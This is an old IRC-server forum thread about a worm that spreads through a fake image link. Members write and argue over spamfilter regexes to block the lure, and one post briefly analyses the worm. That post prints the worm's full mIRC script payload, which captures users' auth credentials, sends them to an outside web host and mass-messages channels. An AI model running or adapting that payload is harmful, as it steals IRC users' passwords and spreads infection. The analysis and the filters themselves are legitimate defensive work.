bloodhound.exploit.6 (symantec's name for it)

nexus · Post by **nexus** » Mon May 10, 2004 10:45 pm

this was seen spreading via channel msg's recently on the net I'm on:

www.fun-pix.tk/blub_fish.jpg <------- looooooooooool

infected users always send that exact text in a channel to new users that join

I wrote a simple spamfilter that works fine, but it probably could use some tweaking

Code: Select all

spamfilter {
	regex "^www\.fun-pix\.tk/blub_fish\.jpg <------- looooooooooool";
	target channel;
	reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
	action block;
};

nexus · Post by **nexus** » Mon May 10, 2004 10:57 pm

maybe something like this would be better, in case more urls need to be added to the regex later (saves space)

Code: Select all

spamfilter {
        regex "^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$";
        target channel;
        reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
        action block;
};

Post by **Syzop** » Tue May 11, 2004 3:47 pm

Thanks for the report, will take a look :).

Post by **Syzop** » Tue May 11, 2004 5:04 pm

Pretty harmless/simple/stupid thing, this is what it does:
It exploits some known IE vuln that X other trojans also use (don't care to look it up ;p)... and then a highly advanced visual basic exe gets started (*laugh*) which tries to use DDE to send the following stuff:

Code: Select all

//write a.mrc on *:socklisten:x:sockaccept i | write a.mrc on *:sockread:i:sockread % $+ t $chr(124) tokenize 32 % $+ t $chr(124) if ($3 == :auth) url -an $!+(mitglied.lycos.de/z4p2k/a.php?d=,$encode($4,m),|,$encode($5,m)) | .load -rs a.mrc | socklisten x 6660 | server -m localhost 6660 | .timer -io 1 1 scon $!scon(0) window -h $+($chr(34),Status Window,$chr(34)) $chr(43) | .timer -io 1 1 scon $!scon(0) auth usepw q q  | .timer -io 1 1 scon $!scon(0) auth usepw 1 | scon -a .AMSG www.fun-pix.tk/blub_fish.jpg <------- looooooooooool

What is interresting is that the exe file contains the following:

Code: Select all

@*\AD:\Stefan\visual basic codes\code99\dde-mirc.vbp

and even:

Code: Select all

CompanyName
Delta Konzept GmbH

(which you can find with google)

now this seem SOO stupid that it might be intentional (or part of it) ;).
Anyway.. still fun. *dinner*.

Dukat · Post by **Dukat** » Thu Jun 10, 2004 8:50 am

nexus wrote:maybe something like this would be better, in case more urls need to be added to the regex later (saves space)
Code: Select all
spamfilter {
        regex "^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$";
        target channel;
        reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
        action block;
};

I think this regex is wrong (sorry for reposting in such an old thread).
But if I am right, the regex is wrong too in the CVS...

If the message is

Code: Select all

www.fun-pix.tk/blub_fish.jpg <------- looooooooooool

Then

Code: Select all

^www\.fun-pix\.tk/blub_fish\.jpg <-{7} lo{12}l$

would be the correct regex, wouldn't it?

aquanight · Post by **aquanight** » Thu Jun 10, 2004 4:45 pm

Actually, an even better regex would be:

Code: Select all

www\.fun-pix\.tk/blub_fish\.jpg <-+ lo+l

Differences being:

Removed BOL and EOL assertions, to account for variants that insert whitespace/color codes/other messages before or after the string.
Changed fixed length of the <- and lol portions to catch any lenght, since variants can easily modify these with more or less '-' or 'o' characters.

I can't imagine hitting false positives, when requring a match against an exact URL (might want to account for variants here?).

codemastr · Post by **codemastr** » Thu Jun 10, 2004 5:11 pm

There is a reason we try to use ^ and $ as much as possible. Your's can have false positives. And here is an example,

<User> Someone just messaged me with, "www.fun-pix.tk/blub_fish.jpg <------- looooooooooool" I think it is a virus, what should I do?

That would be blocked since it doesn't make sure that no other text is there.

aquanight · Post by **aquanight** » Thu Jun 10, 2004 5:22 pm

Hmm... yeah...

Then again, users would have no need to send messages of that kind if you block the original (the user would never receive it).

So maybe keep the ^ and $

. I was just trying to account for variants that could insert text at the beginning or end, but then if such a variant does occur, we can tweak the spamfilter to hit that as well, I guess

.

Dukat · Post by **Dukat** » Sat Jun 12, 2004 7:48 am

Well, BOT, the Regex in the CVS is ATM just wrong and won't match. "Someone" should correct it...

Or should I write a bug report?

Post by **Syzop** » Sat Jun 12, 2004 2:57 pm

Yeah, seems you are right... Strange nobody noticed :(.

Anyway, the page is down now so it no longer matters :p.
(perhaps a good idea to do a cleanup once in a while)

About ^ and $.. I'm always a bit unsure... coz if a user pastes it like that, eg:
<User> <spreader> go to: http://www.virus.com/infectyou.html
<User> any idea what this is??
then the other user might click on it... and we end up with another infection.
So I can understand both points, neither one is perfect :P.
Anyway, another case: a virus spreading in msg.. then the user might paste it like that in a channel... which we didn't block at all... users are always a fun factor ;).
Basically I always just hope that this stuff is kept to a minimum, since we are presumed to block all the stuff in the first place so it never reaches the user... only thing left is cross-nets (or 'old events' / logs).. like: got a virus on dalnet, then ask on an unrealnet (where you are also connected to) what it is.
Blablabla :)